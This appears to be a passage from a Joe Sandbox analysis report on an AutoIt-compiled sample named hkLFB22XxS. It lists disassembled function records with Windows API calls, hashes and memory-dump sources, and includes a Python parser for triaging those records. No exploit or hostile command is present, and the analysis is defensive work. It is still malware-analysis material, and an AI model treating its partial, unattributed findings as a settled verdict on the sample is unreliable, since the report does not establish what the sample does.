                                                            • Opcode ID: 589f4e06d7dc61ae5c20b195d408bf46ad8772b38484e73e530ec2a9bad9374b
                                                            • Instruction ID: 88ce87e2ca13600f4c05d3a9918b418b18b503617ac1d806e0004e3ecb2a1832
                                                            • Opcode Fuzzy Hash: 589f4e06d7dc61ae5c20b195d408bf46ad8772b38484e73e530ec2a9bad9374b
                                                            • Instruction Fuzzy Hash: C0C04CF180010DDBDB05DB90D988DEE77BCBB04315F144056A501F2101D7749B448A71
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0083A36A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 6e51b903f6ba64dd6181eed89b4be1d880024e739e008822b28160b111716c69
                                                            • Instruction ID: c90244e478a75a5937df32483623e3830fa089dbd28f08b5484ba84c056a748f
                                                            • Opcode Fuzzy Hash: 6e51b903f6ba64dd6181eed89b4be1d880024e739e008822b28160b111716c69
                                                            • Instruction Fuzzy Hash: 6AA0123000010CE78A002B51EC044447F5CE600190B004021F50C80122873254505580
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4ded2cb3d1361fdc8a01d65b060dd1ecfbe8fa0e82f16e237e6ea035ed7fbfe
                                                            • Instruction ID: fd12144d4cdd426599cf99d50ccecd9e7fb66bc0cfe714d03d26754108da314a
                                                            • Opcode Fuzzy Hash: f4ded2cb3d1361fdc8a01d65b060dd1ecfbe8fa0e82f16e237e6ea035ed7fbfe
                                                            • Instruction Fuzzy Hash: 60221730A0662ACBDF288F28E4D467DB7B1FB41354F69846AD842CB691DB349DC1CB61
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: f6e276aba9adbcc0683dcde6656fe52e591333234c3c964fd16918f8a613bf32
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 93C1803220519309DF6D8639D43403EBAE1BEE2BB1B1A076DE4B3CB5D4EF20D524D6A0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 404ef839436c748c05bc784a7a6e7835f1b9be02989f683f0b71558ced372d50
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: DFC194322051A30ADF2D463A943413EFBE1BBE27B171A176DE4B2DB5D4EF20D524D660
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: a6e23bb998e7e433d1860a0f4dc4306f21eeeeb040ce56b65cf16d0f803484bb
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 10C1723220519309DF6D463A947803EBAE1FBE2BB171A1B6DE4B3CB5D4EF20D524D660
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: d56e0180c7c2aae2a3a3045c8d25dee7c9ce4bac5e762273b7cf1ab91e58c67d
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: A541D371D1051CEBDF48CFADC991AEEBBF2AF88201F648299D516AB345D730AB41DB40
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: 077b4dc2293ce71b444f297dcd4efbd28c5363fd2697b415d4b6972931dff54f
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: 94019278A00109EFDB44DF98C5909AEFBB5FB48710F2085DAD809A7741DB31AE41DB80
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: d944c4cb135d89b31ce0336b87287b55c9cdbf4fc5933ebd35bdb8cb574d6bca
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: 67018078A00109EFDB48DF99C5909AEFBB5FB88710B6085DAD809A7741DB30AE41DB80
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00887B70
                                                            • DeleteObject.GDI32(00000000), ref: 00887B82
                                                            • DestroyWindow.USER32 ref: 00887B90
                                                            • GetDesktopWindow.USER32 ref: 00887BAA
                                                            • GetWindowRect.USER32(00000000), ref: 00887BB1
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00887CF2
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00887D02
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887D4A
                                                            • GetClientRect.USER32(00000000,?), ref: 00887D56
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00887D90
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DB2
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DC5
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DD0
                                                            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DD9
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DE8
                                                            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DF1
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DF8
                                                            • GlobalFree.KERNEL32(00000000), ref: 00887E03
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887E15
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,008A2CAC,00000000), ref: 00887E2B
                                                            • GlobalFree.KERNEL32(00000000), ref: 00887E3B
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00887E61
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00887E80
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887EA2
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0088808F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: b5372d54efdd0ebea5f63942108760e118215eb8728554ec0d0869646aa0d0af
                                                            • Instruction ID: 237a66c63a0257d8852b9c637e7c23624ce10c356836a1c4a2567d9ad491a3e4
                                                            • Opcode Fuzzy Hash: b5372d54efdd0ebea5f63942108760e118215eb8728554ec0d0869646aa0d0af
                                                            • Instruction Fuzzy Hash: 54022A71900119EFDB14AFA9CC89EAE7BB9FF48310F148159FA15EB2A1DB709D41CB60
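The function record above lists, in call-site address order, how the AutoIt runtime builds a picture window: two CreateWindowExW calls (class "AutoIt v3", then a "static" control), a CreateFileW opened with desired access 80000000 (GENERIC_READ), ReadFile into a GlobalAlloc buffer, CreateStreamOnHGlobal plus OleLoadPicture to decode the image, CopyImage, and SendMessageW with message 00000172 (STM_SETIMAGE) to hand the bitmap to the static control. When triaging many of these records it helps to parse the bullets instead of reading them. The Python below is an added example written for this report page, not Joe Sandbox's own code: it parses "APIs" bullets of this exact textual form (including the "Part of subcall function" variant), turns the hex arguments into integers and keeps literal strings such as "AutoIt v3", and checks whether a chain of APIs occurs in address order. The SAMPLE text is constructed from bullets copied from this report (the last line is taken from a later record so the subcall form is exercised); the chain names and the Windows constants in comments are my own reading, not something the report states.

```python
"""Parse the 'APIs' bullets of a Joe Sandbox function record into structured calls.

Added example for this report page; not Joe Sandbox code. Assumes the bullet
layout shown on the page: '• Api.MODULE(args), ref: ADDR' or '• Api.MODULE ref: ADDR',
optionally prefixed by 'Part of subcall function ADDR:'.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

Arg = Union[int, str, None]  # 8-hex-digit value, literal string, or '?' (unresolved)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                          # call-site address from "ref: ..."
    subcall_of: Optional[int] = None  # set for "Part of subcall function XXXX:" lines


API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None          # Joe Sandbox could not resolve the value statically
    if HEX8.match(tok):
        return int(tok, 16)  # e.g. 80000000 -> GENERIC_READ, 00000172 -> STM_SETIMAGE
    return tok               # literal such as "AutoIt v3" or "static"


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue         # headers like "APIs" / "Strings" and non-API lines are skipped
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("module"), args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def appears_in_order(calls: List[ApiCall], chain: List[str]) -> bool:
    """True if every API name in `chain` is called directly (not via a subcall)
    and the call sites occur in the same order as `chain`, by address."""
    direct = sorted((c for c in calls if c.subcall_of is None), key=lambda c: c.ref)
    pos = 0
    for c in direct:
        if pos < len(chain) and c.api == chain[pos]:
            pos += 1
    return pos == len(chain)


def strings_passed(calls: List[ApiCall]) -> List[str]:
    """Literal string arguments, i.e. the values the report also lists under 'String ID'."""
    return sorted({a for c in calls for a in c.args if isinstance(a, str)})


# Constructed sample: bullets copied from this report's records.
SAMPLE = """\
• DestroyWindow.USER32 ref: 00887B90
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887D4A
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00887D90
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DB2
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DE8
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887E15
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,008A2CAC,00000000), ref: 00887E2B
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00887E80
  • Part of subcall function 0089AB60: GetSysColor.USER32(00000012), ref: 0089AB99
"""

# Chain that reads a file from disk and decodes it as a picture through OLE (my reading of the record).
IMAGE_FROM_FILE = ["CreateFileW", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture"]

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} args={c.args} subcall_of={c.subcall_of}")
    print("image-from-file chain:", appears_in_order(parsed, IMAGE_FROM_FILE))
    print("literal strings:", strings_passed(parsed))
```

Run it on a whole report dump and appears_in_order gives a cheap way to locate records that match a known runtime idiom (here the picture window) so they can be set aside, leaving the unattributed blocks in the 02440000 region, which have no API references at all, as the ones worth manual attention.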
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0089F910), ref: 008938AF
                                                            • IsWindowVisible.USER32(?), ref: 008938D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: 56c28c1978103ea086644f558338c95ef5fb4dc83d62a12db71757cf023d2ffb
                                                            • Instruction ID: bc5332ab76af9d85c9f0dc3d0c60c5af6c7056d4194547e516a823b5cb3ea684
                                                            • Opcode Fuzzy Hash: 56c28c1978103ea086644f558338c95ef5fb4dc83d62a12db71757cf023d2ffb
                                                            • Instruction Fuzzy Hash: CDD13E302047159BCB14FF54C461A6A7BE9FF94358F184558F886DB2A2CB35EE4ACB82
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0089A89F
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0089A8D0
                                                            • GetSysColor.USER32(0000000F), ref: 0089A8DC
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0089A8F6
                                                            • SelectObject.GDI32(?,?), ref: 0089A905
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0089A930
                                                            • GetSysColor.USER32(00000010), ref: 0089A938
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0089A93F
                                                            • FrameRect.USER32(?,?,00000000), ref: 0089A94E
                                                            • DeleteObject.GDI32(00000000), ref: 0089A955
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0089A9A0
                                                            • FillRect.USER32(?,?,?), ref: 0089A9D2
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0089A9FD
                                                              • Part of subcall function 0089AB60: GetSysColor.USER32(00000012), ref: 0089AB99
                                                              • Part of subcall function 0089AB60: SetTextColor.GDI32(?,?), ref: 0089AB9D
                                                              • Part of subcall function 0089AB60: GetSysColorBrush.USER32(0000000F), ref: 0089ABB3
                                                              • Part of subcall function 0089AB60: GetSysColor.USER32(0000000F), ref: 0089ABBE
                                                              • Part of subcall function 0089AB60: GetSysColor.USER32(00000011), ref: 0089ABDB
                                                              • Part of subcall function 0089AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0089ABE9
                                                              • Part of subcall function 0089AB60: SelectObject.GDI32(?,00000000), ref: 0089ABFA
                                                              • Part of subcall function 0089AB60: SetBkColor.GDI32(?,00000000), ref: 0089AC03
                                                              • Part of subcall function 0089AB60: SelectObject.GDI32(?,?), ref: 0089AC10
                                                              • Part of subcall function 0089AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0089AC2F
                                                              • Part of subcall function 0089AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0089AC46
                                                              • Part of subcall function 0089AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0089AC5B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                            • String ID:
                                                            • API String ID: 4124339563-0
                                                            • Opcode ID: 98d1becf788d1eb313b666e6c31ce4ec07e713bb0093c0c38192fd9f890cf6dd
                                                            • Instruction ID: 2bd956c9829f949d66c6d7b3ba50cfa90f274d12c8c82d76cdc915a6f941c431
                                                            • Opcode Fuzzy Hash: 98d1becf788d1eb313b666e6c31ce4ec07e713bb0093c0c38192fd9f890cf6dd
                                                            • Instruction Fuzzy Hash: AEA18471004305EFDB15AF64DC08A6B7BA9FF88321F184A2AF662D61E1D771D944CB92
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 008877F1
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008878B0
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008878EE
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00887900
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00887946
                                                            • GetClientRect.USER32(00000000,?), ref: 00887952
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00887996
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008879A5
                                                            • GetStockObject.GDI32(00000011), ref: 008879B5
                                                            • SelectObject.GDI32(00000000,00000000), ref: 008879B9
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008879C9
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008879D2
                                                            • DeleteDC.GDI32(00000000), ref: 008879DB
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00887A07
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00887A1E
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00887A59
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00887A6D
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00887A7E
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00887AAE
                                                            • GetStockObject.GDI32(00000011), ref: 00887AB9
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00887AC4
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00887ACE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 5e04591712e54224aa4adb42e8603345c93f1bfbcb344be6f05be5d2150a778c
                                                            • Instruction ID: 0afa94c16d55116b7c737d4f6f60fc404ec9764a4303c3536a88fc149cb2c36c
                                                            • Opcode Fuzzy Hash: 5e04591712e54224aa4adb42e8603345c93f1bfbcb344be6f05be5d2150a778c
                                                            • Instruction Fuzzy Hash: 11A16DB1A40209BFEB149BA8DC4AFAA7BB9FF44710F144215FA15E72E1D770AD10CB64
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0087AF89
                                                            • GetDriveTypeW.KERNEL32(?,0089FAC0,?,\\.\,0089F910), ref: 0087B066
                                                            • SetErrorMode.KERNEL32(00000000,0089FAC0,?,\\.\,0089F910), ref: 0087B1C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
